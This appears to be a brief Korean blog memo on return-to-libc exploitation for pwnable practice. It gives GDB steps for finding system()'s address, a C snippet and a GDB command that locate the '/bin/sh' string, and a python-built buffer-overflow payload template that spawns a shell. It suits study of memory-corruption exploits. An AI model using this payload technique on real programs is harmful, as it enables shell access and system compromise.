[System_Addr - GDB]
>b *func
>r
>p system
[Export Exploit_Addr 1]
int main()
{
unsigned int addr;
printf("\nSystem Addr : 0x");
scanf("%x",&addr);
while(memcmp((void*)addr,"/bin/sh",8))addr++;
printf("\n<Calculated Result>\nExploit Addr : 0x%x\n\n",addr);
return 0;
}
[Export Exploit_Addr 2]
>find &system, +99999999, /bin/sh
[Payload Example]
./filename `python -c 'print "\x90"*SizeOfBuf+"System_Addr"+"\x90"*4+"Exploit_Addr"'`
'Repository > Library' 카테고리의 다른 글
| [Library / Pwnable] Buffer Overflow Memo (0) | 2015.08.30 |
|---|
